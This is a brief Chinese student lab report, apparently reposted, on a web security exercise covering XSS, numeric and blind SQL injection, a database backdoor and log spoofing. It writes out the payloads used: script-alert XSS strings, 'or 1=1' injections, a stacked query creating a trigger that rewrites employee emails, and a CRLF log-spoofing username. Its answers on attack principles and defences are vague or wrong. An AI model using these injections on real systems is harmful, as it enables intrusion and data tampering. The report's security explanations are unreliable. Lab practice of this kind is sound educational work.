20145207 Exp9 web安全基础实践

Posted 20145207李祉昂

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了20145207 Exp9 web安全基础实践相关的知识,希望对你有一定的参考价值。

Exp9 web安全基础实践

实验后回答问题

(1)SQL注入攻击原理,如何防御

  • 攻击原理:修改信息
  • 防御:禁止输入

(2)XSS攻击的原理,如何防御

  • 攻击原理:看别人的博客,感觉就是强制访问。
  • 防御:。。。。。不清楚

(3)CSRF攻击原理,如何防御

没做,不知道

实验总结与体会

指导下完成,就完成个最低标准吧

XSS注入攻击

Stored XSS Attacks

   代码:    <script>
                  alert("Hi");
            </script>

       截图(没法体现学号信息,自己加个水印):

Reflected XSS Attacks

       代码:http://www.targetserver.com/search.asp?input=<script>alert("Hi");</script>

       截图:

 

Numeric SQL Injection

  • 通过注入SQL字符串,在101旁边加上or 1=1:

Database Backdoors

  • 实验目的是实现多条SQL语句的注入,在userid中输入101 or 1=1;--
  • 试验成功

Database Backdoors 2

  • 插入两个SQL语句
  • 代码(拷贝的):101 or 1=1;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=\'john@hackme.com\'WHERE userid = NEW.userid;
  • 实验成功

log Spoofing

  • 在用户名中添加hhc%0d%0aLogin Succeeded

盲数字注入(Blind Numeric SQL Injection)

  • 存放在pins表中值pin的内容,行号cc_number=1111222233334444,是一个int型

  •  

  • 最后

以上是关于20145207 Exp9 web安全基础实践的主要内容,如果未能解决你的问题,请参考以下文章

20155210 Exp9 Web安全基础实践

20154321 Exp9: Web安全基础实践

20155223 Exp9 Web安全基础实践

20145236《网络对抗》Exp9 web安全基础实践

Exp9 20155218 Web安全基础实践

EXP9 Web安全基础实践